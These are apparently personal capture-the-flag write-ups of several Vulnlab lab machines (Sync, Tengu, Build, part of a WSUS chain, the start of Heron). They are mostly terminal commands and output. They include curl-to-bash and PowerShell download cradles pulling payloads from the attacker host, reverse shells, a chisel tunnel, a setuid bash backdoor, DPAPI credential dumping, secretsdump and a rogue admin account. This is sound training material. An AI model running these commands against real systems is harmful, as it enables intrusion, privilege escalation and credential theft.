/groupname:"Group1" ____ _ __ ______ _ _ ____ / ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___| \___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) | |____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team [*] Action: Approve Update C:\WSUS-Updates\WsusContent Targeting dc.tea.vl TargetComputer, ComputerID, TargetID ------------------------------------ dc.tea.vl, 216d99cd-2257-41e7-9687-2163fb7e39f7, 1 Group Exists = False Group Created: Group1 Added Computer To Group Approved Update [*] Approve complete C:\_install>
.
┌──(puck㉿kali)-[~/vulnlab] └─$ netexec smb dc.tea.vl -u puckie -p 'Start123!' SMB 10.10.145.21 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False) SMB 10.10.145.21 445 DC [+] tea.vl\puckie:Start123! (Pwn3d!)
.
Finaly
xfreerdp /u:puckie /p:'Start123!' /w:1566 /h:968 /v:dc.tea.vl:3389
.
catch the hashes
impacket-secretsdump 'tea/puckie:Start123!@dc.tea.vl' > allhashes.txt
This was super fun.
.
vulnlab-sync
vulnlab sync
an easy linux box
nmap scan
# Nmap 7.93 scan initiated Mon Aug 19 11:03:10 2024 as: nmap -A -oN sync.nmap 10.10.93.172 Nmap scan report for 10.10.93.172 Host is up (0.023s latency). Not shown: 996 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.5 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4b1533cc6cce0953f8f37d3b082785fa (ECDSA) |_ 256 18fd36c6a505b196147283f862d53821 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-title: Login | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.52 (Ubuntu) 873/tcp open rsync (protocol version 31) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Aug 19 11:03:18 2024 -- 1 IP address (1 host up) scanned in 8.51 seconds
rsync -av --list-only rsync://10.10.93.172/
using rsync getting the source file of website
rsync -av rsync://10.10.93.172:873/httpd ./rsyn_shared
.
found that the hash is combination of three things $secure|$username|$password here the secure hash is working as salt
a0de4d7f81676c3ea9eabcadfd2536f6:6c4972f3717a5e881e282ad3105de01e|triss|
hashcat can crack this one
hashcat -a 0 -m 20 hash.txt /usr/share/wordlists/rockyou.txt -o crackedtriss.txt
We can now ftp to the box ,make a folder .ssh , and upload there our authorized_keys file (id_rsa.pub)
┌──(puck㉿kali)-[~/vulnlab/sync] └─$ ftp 10.10.93.172 Connected to 10.10.93.172. 220 (vsFTPd 3.0.5) Name (10.10.93.172:puck): triss 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 229 Entering Extended Passive Mode (|||41121|) 150 Here comes the directory listing. drwxr-x--- 2 1003 1003 4096 Apr 21 2023 . drwxr-x--- 2 1003 1003 4096 Apr 21 2023 .. lrwxrwxrwx 1 0 0 9 Apr 21 2023 .bash_history -> /dev/null -rw-r--r-- 1 1003 1003 220 Apr 19 2023 .bash_logout -rw-r--r-- 1 1003 1003 3771 Apr 19 2023 .bashrc -rw-r--r-- 1 1003 1003 807 Apr 19 2023 .profile 226 Directory send OK. ftp> mkdir .ssh 257 "/.ssh" created ftp> cd .ssh 250 Directory successfully changed. ftp> put authorized_keys local: authorized_keys remote: authorized_keys 229 Entering Extended Passive Mode (|||6569|) 150 Ok to send data. 100% |************************************************************************| 91 612.87 KiB/s 00:00 ETA 226 Transfer complete. 91 bytes sent in 00:00 (2.32 KiB/s) ftp> ls 229 Entering Extended Passive Mode (|||65353|) 150 Here comes the directory listing. -rw------- 1 1003 1003 91 Aug 19 09:11 authorized_keys 226 Directory send OK.
.
ssh -i ed_25519 triss@10.10.93.172
found a user in /etc/paswwd jenifier , su jennifer (with same pass as triss)
there is a zip file in the /backup directory that is a backup owned by root.
timeout 60s ./pspy64
getting the zip
wget http://10.8.2.138:8000/1698154321.zip
unshadow
$ unshadow passwd shadow > unshadow
crack it
john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadow
User sa has write permission to this shell script.
echo "chmod +s /bin/bash" >> /usr/local/bin/backup.sh cat /usr/local/bin/backup.sh #!/bin/bash mkdir -p /tmp/backup cp -r /opt/httpd /tmp/backup cp /etc/passwd /tmp/backup cp /etc/shadow /tmp/backup cp /etc/rsyncd.conf /tmp/backup zip -r /backup/$(date +%s).zip /tmp/backup rm -rf /tmp/backup chmod +s /bin/bash
wait a minute
/bin/bash -p bash-5.1# id uid=1001(sa) gid=1001(sa) euid=0(root) egid=0(root) groups=0(root),1001(sa) bash-5.1#
that’s all
vulnlab-tengu
vulnlab-tengu
a medium chain containing a ubuntu vm , a sql.tengu.vl and a dc.tengu.vl ( all domain djoined)
noderedsh.py -> extracted krb5keytab- read gMSA -> delegate ->login to mssqlclient.py impersonate ->read pass domain admin pass with SharpDPAPI
node-red exploit [initial access]
a web service running named Node-RED on port 1880 which does not require authentication. We make a flow which executes a reverse shell on the target system:
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ python3 noderedsh.py http://10.10.139.247:1880 [+] Node-RED does not require authentication. [+] Establishing RCE link .... > whoami nodered_svc curl http://10.8.2.138/s.sh | bash
.
python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.139.247 - - [09/Aug/2024 14:21:42] "GET /s.sh HTTP/1.1" 200 -
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ nc -nlvp 9001 listening on [any] 9001 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.139.247] 48442 sh: 0: can't access tty; job control turned off $ whoami nodered_svc $ python3 -c 'import pty;pty.spawn("/bin/bash")' nodered_svc@nodered:/opt/nodered/.node-red$ export TERM=xterm export TERM=xterm nodered_svc@nodered:/opt/nodered/.node-red$ zsh: suspended rlwrap nc -nlvp 443
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ stty raw -echo;fg [1] + continued rlwrap nc -nlvp 443 nodered_svc@nodered:/opt/nodered/.node-red$ nodered_svc@nodered:/tmp$ wget http://10.8.2.138/chisel nodered_svc@nodered:/tmp$ chmod +x chisel nodered_svc@nodered:/tmp$ ./chisel client 10.8.2.138:8000 R:socks
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ chisel server -p 8000 --reverse 2024/08/14 09:18:49 server: Reverse tunnelling enabled 2024/08/14 09:18:49 server: Fingerprint DGcMxm0MtWpKPEJ5EPKN8UyvmAiowDGpTHgWZHQCdOc= 2024/08/14 09:18:49 server: Listening on http://0.0.0.0:8000 2024/08/14 09:20:49 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains crackmapexec mssql sql.tengu.vl -u nodered_connector -p 'DreamPuppy<redacted25>' --local-auth [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 127.0.0.1:1080 ... sql.tengu.vl:1433 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... sql.tengu.vl:445 ... OK MSSQL sql.tengu.vl 1433 SQL [*] Windows Server 2022 Build 20348 (name:SQL) (domain:SQL) [proxychains] Strict chain ... 127.0.0.1:1080 ... sql.tengu.vl:1433 ... OK MSSQL sql.tengu.vl 1433 SQL [+] nodered_connector:DreamPuppy<redacted>25
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains4 sqsh -S 10.10.139.246 -U 'nodered_connector' -P 'DreamPuppy<redacted>25' [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp This is free software with ABSOLUTELY NO WARRANTY For more information type '\warranty' [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.139.246:1433 ... OK 1> show databases; 2> use prod; 3> go Msg 911, Level 16, State 1 Server 'SQL', Line 2 Database 'prod' does not exist. Make sure that the name is entered correctly. 1> select table_name from systable 2> go Msg 208, Level 16, State 1 Server 'SQL', Line 1 Invalid object name 'systable'. 1> SELECT * FROM Dev.INFORMATION_SCHEMA.TABLES; 2> go -m vert TABLE_CATALOG: Dev TABLE_SCHEMA: dbo TABLE_NAME: Task TABLE_TYPE: BASE TABLE (1 row affected) 1> ... 1> SELECT name FROM master.dbo.sysdatabases; 2> go -m vert name: master name: tempdb name: model name: msdb name: Demo name: Dev (6 rows affected) 1> use Demo; 2> go 1> select * from users; 2> go -m vert ID: NULL Username: t2_m.winters Password: af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147 (1 row affected) 1>
.
crackstation.net
resolves this hash to Tengu123
Checking credentials
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains4 -q crackmapexec ldap dc.tengu.nl -u 't2_m.winters' -p 'Tengu123' SMB dc.tengu.nl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False) [proxychains] Strict chain ... 127.0.0.1:1080 ... DC.tengu.vl:389 ... OK LDAP dc.tengu.nl 389 DC [+] tengu.vl\t2_m.winters:Tengu123
Getting krb5.keytab
As this box is domaind joined, we are able to extract the machine ntlm hash from /etc/krb5.keytab by using https://github.com/sosdave/KeyTabExtract
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ python3 keytabextract.py krb5.keytab [*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash. [*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction. [*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction. [+] Keytab File successfully imported. REALM : TENGU.VL SERVICE PRINCIPAL : NODERED$/ NTLM HASH : d4210ee2db0c03aa3611c9ef8a4dbf49 AES-256 HASH : 4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096 AES-128 HASH : 3e04b61b939f61018d2c27d4dc0b385f
.
proxychains4 bloodhound-python -d tengu.vl -c all -u t2_m.winters -p Tengu123 -ns 10.10.219.229 --dns-tcp --zip
In Bloodhound we find he machine account NODERED$
has the permission ReadGMSAPassword
We can use netexec to retrieve the NTLM Hash for the account gMSA01$
──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains4 netexec ldap dc.tengu.vl -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:636 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:135 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK SMB 224.0.0.1 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False) [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:636 ... OK LDAPS 224.0.0.1 636 DC [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49 LDAPS 224.0.0.1 636 DC [*] Getting GMSA Passwords LDAPS 224.0.0.1 636 DC Account: gMSA01$ NTLM: d4b65861e85773fba2035b31ebcacb37 LDAPS 224.0.0.1 636 DC Account: gMSA02$ NTLM:
we notice that we can delegate permissions as this account
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains4 -q impacket-findDelegation 'tengu.vl/nodered$:@dc.tengu.vl' -hashes :d4210ee2db0c03aa3611c9ef8a4dbf49 Impacket v0.12.0.dev1 - Copyright 2023 Fortra AccountName AccountType DelegationType DelegationRightsTo ----------- ----------------------------------- ---------------------------------- -------------------------- gMSA01$ ms-DS-Group-Managed-Service-Account Constrained w/ Protocol Transition MSSQLSvc/SQL:1433 gMSA01$ ms-DS-Group-Managed-Service-Account Constrained w/ Protocol Transition MSSQLSvc/sql.tengu.vl:1433 gMSA01$ ms-DS-Group-Managed-Service-Account Constrained w/ Protocol Transition MSSQLSvc/sql.tengu.vl gMSA01$ ms-DS-Group-Managed-Service-Account Constrained w/ Protocol Transition MSSQLSvc/sql
In bloodhound we will find a SQL_Admins group which contains two users, next we try to impersonate as one of these users
getting the ticket
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains4 netexec ldap dc.tengu.vl -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:636 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:135 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK SMB 224.0.0.1 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False) [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:636 ... OK LDAPS 224.0.0.1 636 DC [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49 LDAPS 224.0.0.1 636 DC [*] Getting GMSA Passwords LDAPS 224.0.0.1 636 DC Account: gMSA01$ NTLM: d4b65861e85773fba2035b31ebcacb37 LDAPS 224.0.0.1 636 DC Account: gMSA02$ NTLM: ┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains4 impacket-getST -spn 'MSSQLSvc/sql.tengu.vl' 'tengu.vl/GMSA01$@sql.tengu.vl' -hashes :d4b65861e85773fba2035b31ebcacb37 -dc-ip 10.10.185.21 -impersonate 't1_m.winters' [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [-] CCache file is not found. Skipping... [*] Getting TGT for user [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.185.21:88 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.185.21:88 ... OK [*] Impersonating t1_m.winters [*] Requesting S4U2self [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.185.21:88 ... OK [*] Requesting S4U2Proxy [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.185.21:88 ... OK [*] Saving ticket in t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache ┌──(puck㉿kali)-[~/vulnlab/tengu]
.
export KRB5CCNAME=t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains4 -q impacket-mssqlclient -k sql.tengu.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(SQL): Line 1: Changed database context to 'master'. [*] INFO(SQL): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (160 3232) [!] Press help for extra shell commands SQL (TENGU\t1_m.winters dbo@master)>
.
SQL (TENGU\t1_m.winters dbo@master)> xp_cmdshell powershell "cd ..\..; mkdir temp; cd C:\temp; certutil.exe -urlcache -f http://10.8.2.138/rcat_10.8.2.138_443.exe rcat_10.8.2.138_443.exe; .\rcat_10.8.2.138_443.exe"
Catch the shell
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.185.22] 57071 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows PS C:\temp> whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled PS C:\temp>
.
godpotato on sql
PS C:\temp> ./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');" ./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');" [*] CombaseModule: 0x140723188531200 [*] DispatchTable: 0x140723191118152 [*] UseProtseqFunction: 0x140723190413536 [*] UseProtseqFunctionParamCount: 6 [*] HookRPC [*] Start PipeServer [*] Trigger RPCSS [*] CreateNamedPipe \\.\pipe\1d5f2595-2789-449b-affd-92979c14b4c6\pipe\epmapper [*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046 [*] DCOM obj IPID: 0000b802-095c-ffff-21e6-2d89c9d2f435 [*] DCOM obj OXID: 0x3beb0139e85dbe21 [*] DCOM obj OID: 0x3a821b5f15430353 [*] DCOM obj Flags: 0x281 [*] DCOM obj PublicRefs: 0x0 [*] Marshal Object bytes len: 100 [*] UnMarshal Object [*] Pipe Connected! [*] CurrentUser: NT AUTHORITY\NETWORK SERVICE [*] CurrentsImpersonationLevel: Impersonation [*] Start Search System Token [*] PID : 908 Token:0x764 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation [*] Find System Token : True [*] UnmarshalObject: 0x80070776 [*] CurrentUser: NT AUTHORITY\SYSTEM [*] process start with pid 3888
catch the shell as nt-authority system and add ourself as local admin on sql
after 1st findind credsof domain admin TENGU\T0_c.fowler
Users may choose to save passwords in Windows by using an application or through the Credential Manager Control Panel applet. These credentials are stored on the hard disk drive and protected by using the Data Protection Application Programming Interface (DPAPI). Any program running as that user will be able to access credentials in this store.
PS C:\temp> wget http://10.8.2.138/sharp.exe -o sharp.exe PS C:\temp> ./sharp.exe machinetriage /showall __ _ _ _ ___ (_ |_ _. ._ ._ | \ |_) /\ |_) | __) | | (_| | |_) |_/ | /--\ | _|_ | v1.11.3 [*] Action: Machine DPAPI Credential, Vault, and Certificate Triage [*] Secret : DPAPI_SYSTEM [*] full: C9C2333305555B68C729FD0938EE5DB5D2C8B33540B36F0AC59918C608686152CB7F09F74A22F544 [*] m/u : C9C2333305555B68C729FD0938EE5DB5D2C8B335 / 40B36F0AC59918C608686152CB7F09F74A22F544 [*] SYSTEM master key cache: {474602b3-bbd6-4a0e-9c1d-52aa0cb0a039}:BE80161FB9DADBFBF9620483D8BC4EF0BDB4B6F5 {7710e63f-a791-438b-8dfa-33f25aef47a8}:6466F58B69E7B437DBCC89D4CAEFEF7E84944CE7 {1415bc56-749a-4f03-8a8e-9fb9733359ab}:FBED03CA71C0CACACF43D8EB3F6D03ADB9C3198B {236fb638-82cd-4a22-b9e7-6745744da5bd}:CD9A01A3056FC877EE9B343AC3BE584AB7DF4D86 [*] Triaging System Credentials Folder : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials CredFile : 67B6C9FA0475C51A637428875C335AAD guidMasterKey : {1415bc56-749a-4f03-8a8e-9fb9733359ab} size : 576 flags : 0x20000000 (CRYPTPROTECT_SYSTEM) algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256) description : Local Credential Data LastWritten : 3/10/2024 2:49:34 PM TargetName : Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2} TargetAlias : Comment : UserName : TENGU\T0_c.fowler Credential : Unt<redacted>y25
.
PS C:\temp> net user puck Password123! /add The command completed successfully. PS C:\temp> net user User accounts for \\ ------------------------------------------------------------------------------- Administrator DefaultAccount Guest puck WDAGUtilityAccount The command completed with one or more errors. PS C:\temp> net localgroup administrators puck /add The command completed successfully.
next rdp to sql as puck
proxychains xfreerdp /u:puck /p:'Password123!' /w:1566 /h:968 /v:10.10.141.134:3389
from there start AD users and computers as user , and add a domain-admin puck , then mstsc to dc.tengu.vl
finaly do a hashdump
proxychains4 impacket-secretsdump 'tengu/puck:Password123!@dc.tengu.vl' > allhashes.txt
Because all Domain Admins are member of the group PROTECTED USERS@TENGU.VL , we can’t rdp in
That was super fun
vulnlab-build
vulnlab-build
an easy Linux box
.
rsync enum
└─$ rsync -av --list-only rsync://10.10.94.243 backups backups └─$ rsync -r rsync://10.10.94.243::backups
Dycrypting Jenkins pasword
┌──(puck㉿kali)-[~/vulnlab/build/jenkins_configuration/secrets] └─$ python3 ../../decrypt.py master.key hudson.util.Secret ../jobs/build/config.xml Git<redacted>!
Login to Gitea as user buildadm, and get RCE by editing the jenkinsfile
Start a netcat listener to catch the shell
┌──(puck㉿kali)-[~/vulnlab/build] └─$ nc -nlvp 9001 listening on [any] 9001 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.94.243] 38892 sh: 0: can't access tty; job control turned off # pwd /var/jenkins_home/workspace/build_dev_main # cd /root # ls user.txt # cat user.txt VL{bf<redacted>c2}
run chisel server
┌──(puck㉿kali)-[~/vulnlab/build] └─$ chisel server -p 8000 --reverse 2024/08/09 10:26:20 server: Reverse tunnelling enabled 2024/08/09 10:26:20 server: Fingerprint pcPwgUx5V0JZX07cMUWbhSsjiQijd+PWFISAgaIp+vE= 2024/08/09 10:26:20 server: Listening on http://0.0.0.0:8000 2024/08/09 10:28:31 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
from docker
# pwd /root/.ssh # wget http://10.8.2.138/chisel sh: 24: wget: not found # curl http://10.8.2.138/chisel -o chisel % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 8506k 100 8506k 0 0 8620k 0 --:--:-- --:--:-- --:--:-- 8618k # chmod +x chisel # ls -la total 8528 drwxr-xr-x 3 root root 4096 Aug 9 08:25 . drwxr-xr-x 1 root root 4096 May 9 18:50 .. lrwxrwxrwx 1 root root 9 May 1 14:37 .bash_history -> /dev/null -r-------- 1 root root 35 May 1 17:37 .rhosts drwxr-xr-x 2 root root 4096 May 1 16:05 .ssh -rwxr-xr-x 1 root root 8711104 Aug 9 08:25 chisel -rw------- 1 root root 37 May 1 14:29 user.txt # ./chisel client 10.8.2.138:8000 R:socks 2024/08/09 08:28:30 client: Connecting to ws://10.8.2.138:8000 2024/08/09 08:28:30 client: Connected (Latency 20.395643ms)
.
nmap the host
┌──(puck㉿kali)-[~/vulnlab/build] └─$ proxychains -q nmap 172.18.0.1 Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-09 10:29 CEST Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 24.50% done; ETC: 10:30 (0:00:46 remaining) Stats: 0:00:36 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 62.10% done; ETC: 10:30 (0:00:23 remaining) Nmap scan report for 172.18.0.1 Host is up (0.059s latency). Not shown: 991 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 512/tcp open exec 513/tcp open login 514/tcp open shell 873/tcp open rsync 3000/tcp open ppp 3306/tcp open mysql 8081/tcp open blackice-icecap Nmap done: 1 IP address (1 host up) scanned in 59.51 seconds ┌──(puck㉿kali)-[~/vulnlab/build]
Do the mysql thing
┌──(puck㉿kali)-[~/vulnlab/build] └─$ proxychains mysql -h 172.18.0.1 -u root [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 127.0.0.1:1080 ... 172.18.0.1:3306 ... OK Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 34 Server version: 11.3.2-MariaDB-1:11.3.2+maria~ubu2204 mariadb.org binary distribution Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | powerdnsadmin | | sys | +--------------------+ 5 rows in set (0.025 sec) MariaDB [(none)]> use powerdnsadmin; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MariaDB [powerdnsadmin]> select * from user; +----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+ | id | username | password | firstname | lastname | email | otp_secret | role_id | confirmed | +----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+ | 1 | admin | $2b$12$s1hK<redacted>Ze3Uw5Sc2.hsEq | admin | admin | admin@build.vl | NULL | 1 | 0 | +----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+ 1 row in set (0.023 sec) MariaDB [powerdnsadmin]> select * from records; +----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+ | id | domain_id | name | type | content | ttl | prio | disabled | ordername | auth | +----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+ | 8 | 1 | db.build.vl | A | 172.18.0.4 | 60 | 0 | 0 | NULL | 1 | | 9 | 1 | gitea.build.vl | A | 172.18.0.2 | 60 | 0 | 0 | NULL | 1 | | 10 | 1 | intern.build.vl | A | 172.18.0.1 | 60 | 0 | 0 | NULL | 1 | | 11 | 1 | jenkins.build.vl | A | 172.18.0.3 | 60 | 0 | 0 | NULL | 1 | | 12 | 1 | pdns-worker.build.vl | A | 172.18.0.5 | 60 | 0 | 0 | NULL | 1 | | 13 | 1 | pdns.build.vl | A | 172.18.0.6 | 60 | 0 | 0 | NULL | 1 | | 14 | 1 | build.vl | SOA | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 | 0 | 0 | NULL | 1 | +----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+ 7 rows in set (0.022 sec) MariaDB [powerdnsadmin]> MariaDB [powerdnsadmin]> INSERT INTO records (id, domain_id, name, type, content, ttl, prio, disabled, ordername, auth) -> VALUES (7, 1, 'admin.build.vl', 'A', '10.8.2.138', 60, 0, 0, NULL,1); Query OK, 1 row affected (0.023 sec) MariaDB [powerdnsadmin]>
.
┌──(puck㉿kali)-[~/vulnlab/build] └─$ john admin.hash Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 4096 for all loaded hashes Will run 8 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Proceeding with wordlist:/usr/share/john/password.lst wi<redacted>on (?) 1g 0:00:00:17 DONE 2/3 (2024-08-09 10:36) 0.05688g/s 40.95p/s 40.95c/s 40.95C/s roman..xavier Use the "--show" option to display all of the cracked passwords reliably Session completed.
Install rsh client on kali box
┌──(puck㉿kali)-[~/vulnlab/build] └─$ sudo apt-get install rsh-redone-client
rsh to build.vl machine as root
┌──(puck㉿kali)-[~/vulnlab/build] └─$ rsh -l root 10.10.94.243 Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-105-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro System information as of Fri Aug 9 08:42:41 AM UTC 2024 System load: 0.64306640625 Usage of /: 62.7% of 9.75GB Memory usage: 60% Swap usage: 0% Processes: 144 Users logged in: 0 IPv4 address for br-f8002c9d7234: 172.18.0.1 IPv4 address for docker0: 172.17.0.1 IPv4 address for ens5: 10.10.94.243 Expanded Security Maintenance for Applications is not enabled. 0 updates can be applied immediately. Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status The list of available updates is more than a week old. To check for new updates run: sudo apt update The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@build:~# pwd /root root@build:~# cat root.txt VL{fe<redacted>b2} root@build:~#
That was fun.
vulnlab-heron
vulnlab-heron
a medium chain
We find a note online with the initial pass to connect to the linux box : pentest:Heron123!
We start chisel on our kali box
